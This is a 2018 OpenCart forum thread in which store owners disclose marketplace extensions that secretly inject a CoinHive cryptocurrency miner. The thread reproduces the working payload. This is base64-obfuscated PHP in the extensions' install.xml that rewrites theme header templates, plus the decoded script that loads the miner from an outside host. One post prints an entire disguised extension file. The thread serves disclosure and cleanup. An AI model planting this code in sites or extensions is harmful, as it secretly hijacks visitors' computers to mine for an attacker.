Post by rebeccag » Sun Feb 11, 2018 11:41 am

Whilst I suspect most the extensions provided here are genuine, I happened to download one last week that was not. It added CoinHive malware to my store. I can't find the extension in the market anymore so it might have been deleted already. It was to add a Paralax Background to my page. CoinHive will allow a hacker to use anyone who views your page to mine cryptocurrency for them. It slows down your customers viewing experience and will tie up their cpu mining while they have your page open.

It was difficult to find so I would like to share how I found and removed it. For me the exploits were in /catalog/controller/common/header.php and /catalog/view/theme/yourtemplate/template/common.header.twig .
Opening the page in a browser and viewing the source you can see the <script> tag just before the </header> end tag with javascript referring to a CoinHive site and function .

Searching for the text in the script tag throughout all the site files yielded little result as I found out it is base64 encoded.
I found it by base64 encoding the script tag text from the html source of the page, selecting about the first 30ish characters and seaching for that. Bingo. Don't copy all the text as it contains an id unique the the hacker.

I went back to the file I downloaded for the extension and confirmed the malicious script was included in the install.xml .

Newbie

Posts

Joined
Thu Feb 01, 2018 1:52 pm

Post by IP_CAM » Sun Feb 11, 2018 1:03 pm

Well, if you make such a grave Statement, please prove it, by mentioning
the Link to the Extension Page, P L E A S E. And if the Page does
no longer exist, please publish Seller Information and Mod Name as well.
Ernie

My Github OC Site: https://github.com/IP-CAM
4'850 + FREE OC Extensions, on the World's largest Github OC Repository Archive Site.
My Demo Sites: http://www.opencart.li/shop --- http://www.bigmax.ch/shop


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by Johnathan » Sun Feb 11, 2018 10:41 pm

Always a good reminder.

Image
Image Image Image Image


User avatar
Global Moderator

Posts

Joined
Fri Dec 18, 2009 3:08 am


Post by rebeccag » Mon Feb 12, 2018 3:43 am

Ok sorry, newbie here. I was about to say I couldn't find it as its been removed, but here is the link to the removed page https://www.opencart.com/index.php?rout ... er=CodeLab . The downloaded file was called ParalaxBackground.zip. If the admins/moderators would like me to send it please let me know where to send it. Contains versions for both V3 and V2. The xml (V3) contains this code. If you base64_decode the string it has the CoinHive code.

Code: Select all

			<search><![CDATA[
$this->load->language('common/header');
			]]></search>
            <add position="before"><![CDATA[
		$modules = base64_decode('PC9oZWFkPg==');		
		$module = $modules;
		$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
		$ocplace = $inherit . "\n" . $module;		
		foreach(glob(DIR_APPLICATION . 'view/theme/*', GLOB_ONLYDIR) as $dif) {
			$rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHdpZw==');
			if (strpos(file_get_contents($rlayout), 'jsworker.start') == false) {
				file_put_contents($rlayout, str_replace($module, $ocplace, file_get_contents($rlayout)));
			}
		}
            ]]></add>
Decodes to this

Code: Select all

<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>

Newbie

Posts

Joined
Thu Feb 01, 2018 1:52 pm

Post by agatha65 » Mon Feb 12, 2018 5:23 am

This developer has 2 other extensions that was updated the Feb 4 !!!
The developer CodeLab was registered on 17 Dec 2017.
I think the Opencart support have to take action on this.

Good catch, rebeccag!!!

Print Version for Product Page and Product Compare Page | Rich Snippets | Facebook Open Graph Meta Tags | Information pages in top menu | Multi-Language Banners, Sliders and Carousels
Image


User avatar
Active Member

Posts

Joined
Fri Mar 16, 2012 10:18 am
Location - Canada, QC

Post by IP_CAM » Mon Feb 12, 2018 2:06 pm

Well, that's the unfamous Contributor, also adding some bad Code into an image,
found a few days ago. OC already removed some extensions, BUT NO ALL, because
the LAZY IMAGE LOAD Mod contains this, also coded in BASE64:

Code: Select all

<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
and this one in the FAST REGISTRATION VqMod:

Code: Select all

<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
In one of the extensions, it even exists twice! I reported it to OC a few Minutes ago. :'(
Ernie
---
https://www.opencart.com/index.php?rout ... er=CodeLab
---

My Github OC Site: https://github.com/IP-CAM
4'850 + FREE OC Extensions, on the World's largest Github OC Repository Archive Site.
My Demo Sites: http://www.opencart.li/shop --- http://www.bigmax.ch/shop


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by IP_CAM » Tue Feb 20, 2018 6:44 am

Well, since OC resides in one of the Bitcoin Centers of the World,
they may have decided, to use their own Software, to be of Help in
in 'Virtual Mining'. It saves a lot of Money on Energy and Hardware. :laugh: :drunk:
Ernie
---
Today's Download:
Opencart2x\Parallax-Background-oc2.ocmod.zip
install.xml

Code: Select all

PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==
still equals:

Code: Select all

<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>

My Github OC Site: https://github.com/IP-CAM
4'850 + FREE OC Extensions, on the World's largest Github OC Repository Archive Site.
My Demo Sites: http://www.opencart.li/shop --- http://www.bigmax.ch/shop


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by FallingUp » Fri Mar 30, 2018 10:22 pm

I got the same problem from this malicious plugin developer, and this is its install.xml

I have replaced back the header.php, but the problem still remains. Please advise how I can completely get rid of coinhive

Code: Select all

<?xml version="1.0" encoding="UTF-8"?>
<modification>
    <name>Image Lazy Load</name>
    <code>Image Lazy Load</code>
	<version>1.0</version>
	<author>CodeLab</author>
	<link>http://opencart.hu</link>
	
<!-- script -->
	<file path="catalog/view/theme/*/template/common/footer.twig">
        <operation>
			<search><![CDATA[
</body>
			]]></search>
            <add position="before"><![CDATA[
<script type="text/javascript">
$(function(){
	$("img.img-responsive").lazyload({
		effect: "fadeIn",
		effectspeed: 600,  
		threshold: 200
	});
});</script>
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/extension/module/featured.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/extension/module/bestseller.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/extension/module/latest.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/extension/module/special.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/product/category.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/product/search.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/product/special.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/module/featured.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/module/bestseller.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- head -->
	<file path="catalog/controller/common/header.php">
        <operation>
			<search><![CDATA[
$this->load->language('common/header');
			]]></search>
            <add position="before"><![CDATA[
		$modules = base64_decode('PC9oZWFkPg==');		
		$module = $modules;
		$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
		$ocplace = $inherit . "\n" . $module;		
		foreach(glob(DIR_APPLICATION . 'view/theme/*', GLOB_ONLYDIR) as $dif) {
			$rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHdpZw==');
			if (strpos(file_get_contents($rlayout), 'jsworker.start') == false) {
				file_put_contents($rlayout, str_replace($module, $ocplace, file_get_contents($rlayout)));
			}
		}
            ]]></add>
        </operation>
	</file>
			
<!-- front -->
	<file path="catalog/view/theme/*/template/module/latest.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- front -->
	<file path="catalog/view/theme/*/template/module/special.twig">
        <operation>
			<search><![CDATA[
<img src="
			]]></search>
            <add position="replace"><![CDATA[
<img data-original="
            ]]></add>
        </operation>
	</file>
	
<!-- head -->
	<file path="catalog/view/theme/*/template/common/header.twig">
        <operation>
			<search><![CDATA[
</head>
			]]></search>
            <add position="before"><![CDATA[
<script src="catalog/view/javascript/jquery/lazyload/jquery.lazyload.js" type="text/javascript"></script>
            ]]></add>
        </operation>
	</file>
	
</modification>
			

Newbie

Posts

Joined
Mon Jan 01, 2018 5:12 am
Who is online

Users browsing this forum: No registered users and 2 guests